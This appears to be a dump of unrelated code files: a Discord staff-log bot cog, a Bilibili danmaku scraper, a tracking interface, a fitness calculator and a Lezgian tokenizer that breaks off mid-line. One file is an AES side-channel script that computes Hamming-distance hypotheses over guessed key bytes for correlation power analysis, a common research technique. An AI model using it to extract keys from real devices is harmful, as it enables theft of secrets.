title=f\"📥 Member joined\",\n colour=discord.Colour.green(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{member}` (`{member.id}`)\"\n ).add_field(\n name=\"Account creation\",\n value=f\"{member.created_at.strftime('%d.%m.%y %H:%M')} UTC \"\n f\"({humanize.naturaldelta(datetime.utcnow() - member.created_at)} ago)\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n async def on_member_remove(self, member: discord.Member):\n info_embed = discord.Embed(\n title=f\"📤 Member left\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{member}` (`{member.id}`)\"\n ).add_field(\n name=\"Joined at\",\n value=f\"{member.joined_at.strftime('%d.%m.%y %H:%M')} UTC \"\n f\"({humanize.naturaldelta(datetime.utcnow() - member.joined_at)} ago)\"\n )\n\n # We can only retrieve more specific information relevant\n # for the infraction database by checking the audit log.\n if member.guild.me.guild_permissions.view_audit_log:\n audit_entry = await member.guild.audit_logs(\n action=discord.AuditLogAction.kick,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == member\n )\n if audit_entry is not None:\n await self.handle_member_kick(member, audit_entry)\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, \"\n \"I can check the audit log for a kick.\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n # This is not emitted by discord.py, but emitted through `on_member_remove` if applicable.\n async def handle_member_kick(self, member: discord.Member, audit_entry: discord.AuditLogEntry):\n info_embed = discord.Embed(\n title=\"👢 Member kicked\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=member.avatar_url\n ).add_field(\n name=\"Reason\",\n value=audit_entry.reason or \"*no reason specified*\"\n ).set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n\n created_infraction = await objects.create(\n Infraction,\n type=InfractionType.kick,\n guild_id=member.guild.id,\n user_id=member.id,\n moderator_id=audit_entry.user.id,\n reason=audit_entry.reason\n )\n\n info_embed.add_field(\n name=\"Infraction\",\n value=f\"created 
with ID `{created_infraction.id}`\\n\"\n f\"use `infr detail {created_infraction.id}` for details\"\n )\n\n await self.log_for(member.guild, info_embed)\n\n async def on_member_ban(self, guild: discord.Guild, user: Union[discord.Member, discord.User]):\n info_embed = discord.Embed(\n title=f\"🔨 Member banned\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=user.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{user}` (`{user.id}`)\"\n )\n\n if guild.me.guild_permissions.view_audit_log:\n audit_entry = await guild.audit_logs(\n action=discord.AuditLogAction.ban,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == user\n )\n if audit_entry is not None:\n info_embed.add_field(\n name=\"Reason\",\n value=audit_entry.reason or \"*no reason specified*\"\n ).set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n\n created_infraction = await objects.create(\n Infraction,\n type=InfractionType.ban,\n guild_id=guild.id,\n user_id=user.id,\n moderator_id=audit_entry.user.id,\n reason=audit_entry.reason\n )\n info_embed.add_field(\n name=\"Infraction\",\n value=f\"created with ID `{created_infraction.id}`\\n\"\n f\"use `infr detail {created_infraction.id}` for details\"\n )\n\n else:\n info_embed.set_footer(\n text=\"Tried fetching ban information from the \"\n \"audit log, but couldn't find any relevant entry.\"\n )\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, I can give more information.\"\n )\n\n await self.log_for(guild, info_embed)\n\n async def on_member_unban(self, guild: discord.Guild, user: discord.User):\n info_embed = discord.Embed(\n title=f\"🤝 Member unbanned\",\n colour=discord.Colour.blurple(),\n timestamp=datetime.utcnow()\n ).set_thumbnail(\n url=user.avatar_url\n ).add_field(\n name=\"User\",\n value=f\"`{user}` (`{user.id}`)\"\n )\n\n if guild.me.guild_permissions.view_audit_log:\n audit_entry = await guild.audit_logs(\n action=discord.AuditLogAction.unban,\n after=thirty_seconds_ago()\n ).find(\n lambda entry: entry.target == user\n )\n\n if audit_entry is not None:\n info_embed.set_footer(\n text=f\"Authored by {audit_entry.user} ({audit_entry.user.id})\",\n icon_url=audit_entry.user.avatar_url\n )\n info_embed.timestamp = audit_entry.created_at\n else:\n info_embed.set_footer(\n text=\"Tried fetching unban information from the \"\n \"audit log, but couldn't find any relevant entry.\"\n )\n else:\n info_embed.set_footer(\n text=\"By giving me the `view audit log` permission, I can give more information.\"\n )\n\n await self.log_for(guild, info_embed)\n\n @commands.group(name='log', aliases=['stafflog'])\n @commands.has_permissions(manage_messages=True)\n @commands.guild_only()\n async def log_(self, ctx):\n \"\"\"Contains subcommands for managing the staff log.\"\"\"\n\n @log_.command(aliases=['on'])\n async def enable(self, ctx, channel: discord.TextChannel = None):\n \"\"\"\n Enable the stafflog in the given channel.\n\n If a staff log channel was set previously,\n the channel argument may be ommitted.\n \"\"\"\n\n if channel is None:\n try:\n channel_object = await objects.get(\n StaffLogChannel,\n guild_id=ctx.guild.id\n )\n except DoesNotExist:\n error_embed = discord.Embed(\n title=\"Failed to enable log channel\",\n description=(\"There is no staff log channel currently set. 
\"\n \"Pass one as an argument to this command.\"),\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n else:\n if channel_object.enabled:\n response_embed_title = \"Staff log was already enabled\"\n response_embed_description = (\n \"The log channel is already enabled and the channel \"\n f\"is set to <#{channel_object.channel_id}>.\"\n )\n else:\n channel_object.enabled = True\n await objects.update(channel_object, only=['enabled'])\n\n response_embed_title = \"Staff log is now enabled\"\n response_embed_description = (\n \"Staff logging was successfully enabled \"\n f\"in <#{channel_object.channel_id}>.\"\n )\n\n response_embed = discord.Embed(\n title=response_embed_title,\n description=response_embed_description,\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n\n else:\n channel_object, created = await objects.get_or_create(\n StaffLogChannel,\n guild_id=ctx.guild.id,\n defaults={\n 'channel_id': channel.id,\n 'enabled': True\n }\n )\n if created:\n response_embed = discord.Embed(\n title=\"Staff log is now enabled\",\n description=f\"The logging channel was set to {channel.mention}.\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n else:\n channel_object.channel_id = channel.id\n channel_object.enabled = True\n await objects.update(channel_object, only=('channel_id', 'enabled'))\n\n response_embed = discord.Embed(\n title=\"Staff log is now enabled\",\n description=f\"Staff logging was successfully enabled in {channel.mention}\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n\n @log_.command(aliases=['off'])\n async def disable(self, ctx):\n \"\"\"\n Disable the staff log on the given guild.\n You can re-enable it at any time by using\n the `enable` command.\n \"\"\"\n\n try:\n channel_object = await objects.get(\n StaffLogChannel,\n guild_id=ctx.guild.id\n )\n except DoesNotExist:\n error_embed = discord.Embed(\n title=\"Failed to disable staff log\",\n description=\"There is no staff log channel set on this guild.\",\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n else:\n if channel_object.enabled:\n channel_object.enabled = False\n await objects.update(channel_object, only=['enabled'])\n\n response_embed = discord.Embed(\n title=\"Successfully disabled staff log\",\n description=\"If you wish to re-enable it, use the `enable` command.\",\n colour=discord.Colour.green()\n )\n await ctx.send(embed=response_embed)\n else:\n error_embed = discord.Embed(\n title=\"Failed to disable staff log\",\n description=\"Staff log is already disabled. 
Use `enable` to enable it.\",\n colour=discord.Colour.red()\n )\n await ctx.send(embed=error_embed)\n","sub_path":"bolt/cogs/stafflog/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"126510275","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pyAES.myAES import AES_unroll\nfrom Control.utility import *\nimport numpy as np\nimport pickle\n\naobj = AES_unroll()\nhamming_distance = {}\nintermediate_values = {}\nnum = 0\n\n\ndef cal_hamming(A):\n hamming = []\n a = []\n nine = A.data[9]\n ten = A.data[10]\n for i in range(len(nine)):\n a.append(format(nine[i] ^ ten[i], '08x'))\n for data in a:\n hamming.extend([str(bin(int('0x' + (i+j), 0))).count('1')\n for (i, j) in zip(data[::2], data[1::2])])\n return(hamming)\n\n\n# load cipher text\nwith open('./pkl/cipher.pkl', 'rb') as f:\n cipher = pickle.load(f)\n\n# cipher text loop\nfor ct in cipher:\n # guess_key loop (256)\n for partial_key in range(256):\n key = [partial_key*2**8 + partial_key for l in range(8)]\n aobj.keyExpansion(key)\n # change key of 10R\n aobj.subkey[40:44] = [\n int('0x' + format(partial_key, '02x')*4, 0) for loop in range(4)]\n aobj.decrypt(ct) # decrypt\n if(partial_key == 0):\n cpa_tmp = np.array([cal_hamming(aobj)])\n else:\n cpa_tmp = np.append(cpa_tmp, [cal_hamming(aobj)], axis=0)\n if num == 0:\n cpa = np.array([cpa_tmp])\n else:\n cpa = np.append(cpa, np.array([cpa_tmp]), axis=0)\n num += 1\n print(num)\n\n# list for shift rows\nlis = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]\n\n# write file\nfor num in range(16):\n with open('./pkl/b' + str(num) + '.pkl', mode='wb') as f:\n data = cpa[:, :, lis[num]]\n print(data.shape)\n pickle.dump(data, f)\n","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"473820702","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 21 12:01:25 2020\r\n@author: huzey\r\n\r\nReads the csv files produced by Rank List2 and saves them as txt files with two columns: time and comment\r\nThe csv files and the generated txt files live in the same folder\r\nThe program automatically creates a subfolder for each category\r\nUsage: edit the save path at the marked spot; after running you get a batch of csv files\r\n!!!Do not modify at will\r\nTargets the new Bilibili ranking page introduced by the 2020.10.16 redesign\r\nhttps://www.bilibili.com/v/popular/rank/all\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport operator\r\nimport numpy as np\r\n \r\n\r\n# fetch the url\r\ndef getHTMLText(url):\r\n try:\r\n # print(\"fetching url...\")\r\n re=requests.get(url,timeout=5000)\r\n re.raise_for_status()\r\n re.encoding=re.apparent_encoding\r\n print(\"url fetched\")\r\n return re.text\r\n except:\r\n print(\"failed to fetch url\")\r\n\r\ndef parsePage(text):\r\n try:\r\n # print(\"parsing text...\")\r\n keyStr = re.findall(r'\"cid\":[\\d]*',text)\r\n # Bilibili exposes the cid in two ways: an API field or a plain match in the page source; the second is more common\r\n if not keyStr:\r\n # an empty list evaluates as \"False\"\r\n keyStr = re.findall(r'cid=[\\d]*', text)\r\n key = eval(keyStr[0].split('=')[1])\r\n else:\r\n key = eval(keyStr[0].split(':')[1])\r\n commentUrl = 'https://comment.bilibili.com/' + str(key) + '.xml' \r\n # danmaku (bullet comment) storage address\r\n # print(\"fetching danmaku\")\r\n commentText=getHTMLText(commentUrl)\r\n soup = BeautifulSoup(commentText, \"html.parser\")\r\n # soup2=BeautifulSoup(text,\"html.parser\")\r\n commentList={}\r\n \r\n # find() method: get the text, strip the whitespace\r\n for comment in soup.find_all('d'):\r\n time=float(comment.attrs['p'].split(',')[0])\r\n # tag.attrs (tag attributes, dict type)\r\n commentList[time]=comment.string\r\n 
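# Sorting the (timestamp, text) pairs by their float timestamp key restores
# chronological order. A minimal sketch of the same idiom, with made-up
# values rather than real danmaku data:
# sorted({3.5: 'b', 1.0: 'a'}.items(), key=operator.itemgetter(0))
# == [(1.0, 'a'), (3.5, 'b')]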
newDict=sorted(commentList.items(),key=operator.itemgetter(0))\r\n # sort the dict by key\r\n commentList=dict(newDict)\r\n print(\"text parsed\")\r\n return commentList,key\r\n except:\r\n print(\"parsing failed\")\r\n \r\n \r\n \r\ndef float2time(f):\r\n timePlus=int(f)\r\n m=timePlus//60\r\n s=timePlus-m*60\r\n return str(m)+':'+str(s).zfill(2)\r\n \r\ndef ioFunc(commentList,root):\r\n print(\"writing text...\")\r\n path = root + '.txt'\r\n print(path)\r\n f = open(path, 'w',encoding='utf-8')\r\n ws = \"{:7}\\t{}\\n\".format('time', 'comment')\r\n f.write(ws)\r\n lastTime=0\r\n for time,string in commentList.items():# remember .items()\r\n lastTime = float2time(time)\r\n ws = \"{:7}\\t{}\\n\".format(lastTime,string)\r\n f.write(ws) \r\n # manual line break\r\n\r\n\r\n\r\n# no need to crawl everything\r\n# the monthly/weekly/daily ranking lists no longer exist\r\n# edit the categories to crawl here\r\ntypeItem = ['动画','音乐','舞蹈','游戏','科技','生活','鬼畜','时尚']\r\nimport time \r\nimport re \r\nimport os\r\n\"\"\"edit the save path here\"\"\"\r\nfilepath = 'D:/bilibili/2020_10_21/'\r\n\r\n\"\"\"crawling too much at once gets the IP blocked by Bilibili, very annoying\"\"\"\r\nfor typetemp in typeItem :# edit the category to crawl here typeItem4 \r\n filename = filepath + str(typetemp) + '.csv'\r\n print(filename)\r\n with open(filename,encoding='utf_8_sig') as file:\r\n BVInfo = pd.read_csv(file)\r\n BVUrl = BVInfo['url']\r\n Title = BVInfo['tittle']\r\n AllTittle=[]\r\n for OneUrl in BVUrl:\r\n # .values strips the pesky name and dtype\r\n OneTittle = BVInfo[BVInfo.url== OneUrl]['tittle'].values \r\n # print(\"title:\",OneTittle,type(OneTittle))\r\n print('url:',OneUrl,type(OneUrl))\r\n temp_url = re.search(r\"(?<=https://www.bilibili.com/video/)\\S+\",OneUrl).group() # use group(num) or groups() on the match object to get the matched content.\r\n # print(temp_url)\r\n StrOneTittle = str(OneTittle)\r\n \r\n text=getHTMLText(OneUrl)\r\n \r\n try:\r\n commentList,key=parsePage(text)\r\n except:\r\n print(\"parsing skipped\")\r\n # skip entries that failed to parse\r\n continue \r\n # check whether the folder exists, create it if not\r\n DocPath = filepath+str(typetemp)+ '/'\r\n \r\n if not os.path.exists(DocPath):\r\n os.makedirs(DocPath) \r\n print(DocPath)\r\n \r\n \r\n SavePath = DocPath + str(key)\r\n if not os.path.exists( SavePath + '_'+temp_url ):\r\n # danmaku id + BV id\r\n ioFunc(commentList,SavePath +'_'+temp_url)\r\n print(\"Finish.\")\r\n print(\"----Pause---3min----\")\r\n time.sleep(180) # in seconds; rest 3 min after crawling one category\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Bullet_Screen2.py","file_name":"Bullet_Screen2.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"218467154","text":"from assignment import *\nfrom competence import Competence\n\ndef calculate_minimum(agent_competence, required_competence):\n difference= agent_competence-required_competence\n x = min(difference,0)\n return x\n\ndef calculate_maximum(agent_competence, required_competence):\n difference= agent_competence-required_competence\n x = max(difference,0)\n return x\n\ndef calc_degree_of_undercompetence(assignment):\n total_undercompetence=0\n count=0\n for i in assignment:\n undercompetence = 0\n #for agent in i[1]:\n for comp in i[1].competences:\n if comp.competence == i[0].competence:\n one_agent_undercomp = calculate_minimum(comp.competence_level, i[0].competence_level)\n undercompetence= undercompetence + one_agent_undercomp\n if one_agent_undercomp<0:\n count=count+1\n undercompetence=i[0].importance * abs(undercompetence)#/len(i[1])\n total_undercompetence = total_undercompetence + undercompetence\n #print 'Undercompetence: ', total_undercompetence\n if count > 0:\n return (total_undercompetence) / count\n else:\n return 0\n\ndef calc_degree_of_overcompetence(assignment):\n 
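# Mirror image of calc_degree_of_undercompetence above: only positive gaps
# (agent level above the task's required level) are accumulated, weighted by
# task importance, and averaged over the number of overqualified matches.
# Sketch with invented levels: max(5 - 3, 0) == 2 counts as overcompetence,
# while max(2 - 3, 0) == 0 is ignored.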
total_overcompetence=0\n count=0\n for i in assignment:\n overcompetence = 0\n #for agent in i[1]:\n for comp in i[1].competences:\n if comp.competence == i[0].competence:\n one_agent_overcomp = calculate_maximum(comp.competence_level, i[0].competence_level)\n overcompetence= overcompetence + one_agent_overcomp\n if one_agent_overcomp > 0:\n count=count+1\n overcompetence=i[0].importance * overcompetence#/len(i[1])\n total_overcompetence = total_overcompetence + overcompetence\n #print 'Overcompetence: ', total_overcompetence\n if count>0:\n return (total_overcompetence)/count\n else:\n return 0\n\n#penalty_v of undercompetence\ndef calc_fitness(assignment, penalty_v):\n undercomp = calc_degree_of_undercompetence(assignment)\n overcomp= calc_degree_of_overcompetence(assignment)\n return 1-(penalty_v*undercomp + (1-penalty_v)*overcomp)\n\n\ndef calc_non_fitness(assignment, penalty_v):\n undercomp = calc_degree_of_undercompetence(assignment)\n overcomp= calc_degree_of_overcompetence(assignment)\n return penalty_v*undercomp + (1-penalty_v)*overcomp\n","sub_path":"degreeOfFitness.py","file_name":"degreeOfFitness.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"360871106","text":"import cv2\nimport sys\nimport os\nimport imageio\nimport glob\nimport copy\nimport time\nimport numpy as np\n\n\nfrom .MLP import MLP_Detection_MP\nfrom .video import Video\nfrom .matched_filters import MatchedFilter\nfrom .utils import * \nfrom .config import *\n\nclass Interface:\n def __init__(self, init_bbox=None):\n # Set up tracker.\n self.tracker = creat_tracker(tracker_type)\n # Set up Matched Filter\n self.MF = MatchedFilter(KERNEL_PATH)\n # Initialize variables\n self.prev_angle = None\n self.init_bbox = None\n self.frame_num = 0\n\n def init_tracker(self, frame, init_bbox=None):\n \"\"\"\n Initialize tracker given bbox and first frame\n\n Params: \n frame: initial frame\n init_bbox: bounding box\n Return:\n ret: if initialization is successful (boolean)\n \"\"\"\n # Use MLP find init_bbox if init_bbox is none\n \"\"\"\n if init_bbox is None:\n for _ in range(INIT_FRAMES_NUM):\n MLP_Detection_MP(frame, init_detection=True)\n # Read first frame.\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n init_bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n # Stop if both methods failed\n if init_bbox is None:\n raise ValueError(\"Initial Tracking Failed!!!\")\n self.init_bbox = copy.copy(init_bbox)\n\n # Initialize tracker with first frame and bounding box\n return self.tracker.init(frame, init_bbox)\n \"\"\"\n for _ in range(INIT_FRAMES_NUM):\n MLP_Detection_MP(frame, init_detection=True)\n #init_bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n #if init_bbox is None:\n # raise ValueError(\"Initial Tracking Failed!!!\")\n init_bbox=[0,0,51,51]\n self.init_bbox = copy.copy(init_bbox)\n self.tracker.init(frame, init_bbox)\n return\n\n\n\n def update(self, frame, verbose=False):\n \"\"\"\n Compute bbox and angle given current frame\n\n Params:\n frame: current color image \n Return:\n ret: if updating is successful (boolean)\n bbox: bounding bbox\n angle: float value\n center_loc: the center of target [x, y]\n \"\"\"\n # Start timer\n timer = cv2.getTickCount()\n\n # Read a new frame\n self.frame_num += 1\n angle = None\n frame_original = frame.copy() # make a copy for result saving\n \n # Update tracker\n ok, bbox = self.tracker.update(frame)\n # bbox 
limitation (fixed w and h)\n if ok and (tracker_type == \"KCF\" or bbox[2] * bbox[3] <= 0):\n bbox = list(bbox)\n bbox[2:] = [self.init_bbox[2], self.init_bbox[3]]\n bbox = tuple(bbox)\n\n if ok:\n # Crop patch and analysis using histogram\n ok, bs_patch = cropImageAndAnalysis(frame, bbox)\n\n # Use decision buffer to make final decision.\n ok = pushBuffer(ok)\n \n # Draw bounding box\n if not ok:\n # Tracking failure\n bbox, bs_patch = MLP_Detection_MP(frame, init_detection=False)\n if bbox is None:\n if verbose:\n print(\" !!! -> Tracking Failed! Skip current frame...\")\n self.prev_angle = None\n return False, None, None, None\n\n # Reinitialize tracker\n del self.tracker # release the object space\n self.tracker = creat_tracker(tracker_type)\n self.tracker.init(frame, bbox) \n \n # Apply matched filter to compute the angle of target\n bbox = np.array(bbox).astype(int)\n if bs_patch is not None:\n kernel_angle_idx, center_loc = self.MF.applyFilters(frame_original.copy(), bs_patch.copy(), bbox)\n if kernel_angle_idx is not None:\n angle = self.MF.getTargetAngle(kernel_angle_idx, bs_patch, frame_original.copy(), \n center_loc, bbox, self.prev_angle)\n center_loc = (np.array(center_loc) + np.array(bbox[:2])).astype(int)\n if angle is not None:\n self.prev_angle = angle\n else:\n return False, bbox, None, center_loc\n else:\n center_loc = (np.array(center_loc) + np.array(bbox[:2])).astype(int)\n return False, bbox, None, center_loc\n else:\n return False, bbox, None, None\n # Calculate Frames per second (FPS)\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer);\n\n if verbose:\n # Print out current info.\n print(\"image {:5d} | bbox: {:4d} {:4d} {:3d} {:3d} | FPS: {:2d} | anlge: {}\".format(\n self.frame_num, \n int(bbox[0]), int(bbox[1]), \n int(bbox[2]), int(bbox[3]),\n int(fps),\n angle)) \n return ok, bbox, angle, center_loc\n\n# This is an example for using Interface\n# To avoid opening opencv window and verbose information, \n# please set the variables:\n# WRITE_TMP_RESULT = True\n# DEBUG_MODE = False\n# \nif __name__ == \"__main__\":\n # Read video\n files = glob.glob(IMAGE_PATH)\n assert len(files) > 0\n\n _, path_and_file = os.path.splitdrive(files[0])\n path, file = os.path.split(path_and_file)\n\n video = Video(files, FILE_FORMAT, START_FRAME)\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n\n tracker = Interface()\n tracker.init_tracker(frame)\n\n while True:\n # Read one frame\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n\n # Obtain results\n ok, bbox, angle, center_loc = tracker.update(frame, verbose=False)\n if ok:\n print(\"bbox: {:4d} {:4d} {:3d} {:3d} | anlge: {:3d} | center: {:4d} {:4d}\".format(\n int(bbox[0]), int(bbox[1]), \n int(bbox[2]), int(bbox[3]),\n int(angle),\n center_loc[0], center_loc[1])) \n drawBox(frame, bbox)\n drawAnlge(frame, angle, bbox)\n drawPoint(frame, center_loc)\n frame_resize = cv2.resize(frame, (512, 512))\n cv2.imshow(\"frame\", frame_resize)\n cv2.waitKey(1)\n else:\n print(\" ->Tracking failed!!!\")\n\n\n\n\n\n\n\n\n","sub_path":"Kite_Tracking_angle_detection_16fps/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203301015","text":"import re\ntext = open('wiki.txt', encoding='utf-8-sig')\ntext = text.read()\ntext = re.sub(' ',' ',text)\nstr = re.sub('\\\\n\\\\n',' ',text)\n#str1 = 'Я люблю есть. Она любит есть? 
Он - он любит есть! Она) любит есть.'\nsentences = []\npunct = ['.','!','?']\npunct2 = [';',':','-','\"', '(', ')', ',']\ntokens = []\ndict_tokens = {}\ntranslit_dict = {'а': 'a',\n 'б': 'b',\n 'в': 'v',\n 'г': 'g',\n 'д': 'd',\n 'е': 'e',\n 'ё': 'jo',\n 'ж': 'zh',\n 'з': 'z',\n 'и': 'i',\n 'й': 'i',\n 'к': 'k',\n 'л': 'l',\n 'м': 'm',\n 'н': 'n',\n 'о': 'o',\n 'п': 'p',\n 'р': 'r',\n 'с': 's',\n 'т': 't',\n 'у': 'u',\n 'ф': 'f',\n 'х': 'kh',\n 'ц': 'c',\n 'ч': 'ch',\n 'ш': 'sh',\n 'щ': 'shch',\n 'ъ': '',\n 'ы': 'y',\n 'ь': '′',\n 'э': 'e',\n 'ю': 'ju',\n 'я': 'ya'}\n\nstr = str.split()\n\ndef translit(word):\n new_word = ''\n for j in word:\n if j.lower() in translit_dict:\n new_word += translit_dict[j.lower()]\n else:\n new_word += j.lower()\n return(new_word)\n\n\ntokens_for_sent = []\nindex = 1\nfor i in str:\n if len(i) > 1 and i[-1] not in punct:\n tokens_for_sent.append([index, i, translit(i)])\n index += 1\n elif len(i) > 1 and i[-1] in punct:\n tokens_for_sent.append([index, i[:-1], translit(i[:-1])])\n index += 1\n tokens_for_sent.append([index, i[-1], translit(i[-1])])\n tokens.append([tokens_for_sent])\n tokens_for_sent = []\n index = 1\n else:\n tokens_for_sent.append([index, i[-1], translit(i[-1])])\n index+=1\n\nprint(tokens)\n#--------------------------------------------------------------Segmenter + tokeniser + translit\n\nfor i in tokens[1]:\n print('%s\\t' % ('index'),('word'),('translit'), end='')\n print('\\n')\n for j in i:\n for k in j:\n print('%s\\t' % (k), end='')\n print('\\n')\n\ni = 0\nfor qq in tokens:\n for q in qq:\n if i < 100:\n print(q)\n i += len(q)\n else:\n break\n\n#-------------------------------------------------------------Tokens for POS marking\n\nlez_dict = [[[[1, 'Нептун:', 'neptun:', 'NOUN'], [2, 'Нептун', 'neptun', 'NOUN'], [3, '—', '—', 'PUNCT'], [4, 'Ракъинин', 'rakinin', 'ADJ'], [5, 'системада', 'sistemada', 'NOUN'], [6, 'планета', 'planeta', 'NOUN'], [7, '.', '.', 'PUNCT']],\n[[1, 'Ё:', 'jo:', 'NOUN'], [2, 'Ё', 'jo', 'NOUN'], [3, 'А', 'a', 'PRON'], [4, '(кирилл):', '(kirill):', 'NOUN'], [5, 'А,', 'a,', 'PRON'], [6, 'а', 'a', 'PRON'], [7, '—', '—', 'PUNCT'], [8, '\"А,', '\"a,', 'PRON'], [9, 'а\"', 'a\"', 'PRON'], [10, 'садлагьай', 'sadlag′ai', 'NUM'], [11, 'гьарф', 'g′arf', 'VERB'], [12, 'лезги', 'lezgi', 'ADJ'], [13, 'алфибдин', 'alfibdin', 'NOUN'], [14, '.', '.', 'PUNCT']],\n[[1, 'Ачух', 'achukh', 'ADJ'], [2, 'гьарф', 'g′arf', 'NOUN'], [3, 'я', 'ya', 'NOUN'], [4, '.', '.', 'PUNCT']],\n[[1, 'Абажур:', 'abazhur:', 'NOUN'], [2, 'Абажур', 'abazhur', 'NOUN'], [3, '(),', '(),', 'PUNCT'], [4, '()', '()', 'PUNCT'], [5, '-', '-', 'PUNCT'], [6, 'гудай', 'gudai', 'VERB'], [7, 'лампадал', 'lampadal', 'NOUN'], [8, 'акьалжнавай', 'ak′alzhnavai', 'PART'], [9, 'парчадикай', 'parchadikai', 'ADJ'], [10, 'раснавай', 'rasnavai', 'PART'], [11, 'къалпагъ', 'kalpag', 'NOUN'], [12, '.', '.', 'PUNCT']],\n[[1, 'Абдул', 'abdul', 'NOUN'], [2, 'Мухътедир', 'mukhtedir', 'NOUN'], [3, 'Айдунбекви:', 'aidunbekvi:', 'NOUN'], [4, 'Биография', 'biografiya', 'NOUN'], [5, '.', '.', 'PUNCT']],\n[[1, 'Дагъустан', 'dagustan', 'ADJ'], [2, 'республикадин', 'respublikadin', 'ADJ'], [3, 'Самур', 'samur', 'NOUN'], [4, 'округдин', 'okrugdin', 'NOUN'], [5, 'Ахцегь', 'akhceg′', 'NOUN'], [6, 'хуьре,', 'khu′re,', 'NOUN'], [7, 'кесиб', 'kesib', 'ADJ'], [8, '—', '—', 'PUNCT'], [9, 'лежбердин', 'lezhberdin', 'NOUN'], [10, 'кӀвале', 'kӏvale', 'NOUN'], [11, 'хьана', 'kh′ana', 'VERB'], [12, '.', '.', 'PUNCT']],\n[[1, '1898', '1898', 'NUM'], [2, 'йисалай,', 'iisalai,', 'ADV'], [3, 'Бакуда', 
'bakuda', 'NOUN'], [4, 'нафтадин', 'naftadin', 'PART'], [5, 'промышленностда', 'promyshlennostda', 'NOUN'], [6, 'кӀвалахзва', 'kӏvalakhzva', 'NOUN'], [7, '.', '.', 'PUNCT']],\n[[1, '1904', '1904', 'NUM'], [2, 'йисуз', 'iisuz', 'ADV'], [3, 'Коммунист', 'kommunist', 'ADJ'], [4, 'партиядин', 'partiyadin', 'NOUN'], [5, 'касарикай', 'kasarikai', 'NOUN'], [6, 'сад', 'sad', 'ADV'], [7, 'жезва', 'zhezva', 'NOUN'], [8, '.', '.', 'PUNCT']],\n[[1, '«Гуммет»', '«gummet»', 'NOUN'], [2, 'социал', 'social', 'ADJ'], [3, '—', '—', 'PUNCT'], [4, 'демократик', 'demokratik', 'ADJ'], [5, 'кӀеретӀдин,', 'kӏeretӏdin,', 'NOUN'], [6, 'нафтадин', 'naftadin', 'PART'], [7, 'промышленностда', 'promyshlennostda', 'NOUN'], [8, 'кӀвалахзвабрин', 'kӏvalakhzvabrin', 'ADJ'], [9, 'садвалдин', 'sadvaldin', 'NOUN'], [10, 'ва', 'va', 'CONJ'], [11, '1906', '1906', 'NUM'], [12, 'йисуз', 'iisuz', 'ADV'], [13, '—', '—', 'PUNCT'], [14, '«Фаррук»', '«farruk»', 'NOUN'], [15, '—', '—', 'PUNCT'], [16, 'социал', 'social', 'ADJ'], [17, '—', '—', 'PUNCT'], [18, 'демократик', 'demokratik', 'ADJ'], [19, 'кӀретӀдин', 'kӏretӏdin', 'ADJ'], [20, 'актив', 'aktiv', 'NOUN'], [21, 'иштиракчи', 'ishtirakchi', 'NOUN'], [22, 'хьанва', 'kh′anva', 'VERB'], [23, '.', '.', 'PUNCT']],\n[[1, 'Пачагьлугъ', 'pachag′lug', 'NOUN'], [2, 'паталай', 'patalai', 'PREP'], [3, 'са', 'sa', 'NUMB'], [4, 'шумуд', 'shumud', 'ADJ'], [5, 'сфер', 'sfer', 'NOUN'], [6, 'жазарих', 'zhazarikh', 'VERB'], [7, 'галукьнвайдия', 'galuk′nvaidiya', 'VERB'], [8, '.', '.', 'PUNCT']]]]\n\npos = []\nfor i in lez_dict:\n for k in i:\n for j in k:\n c = 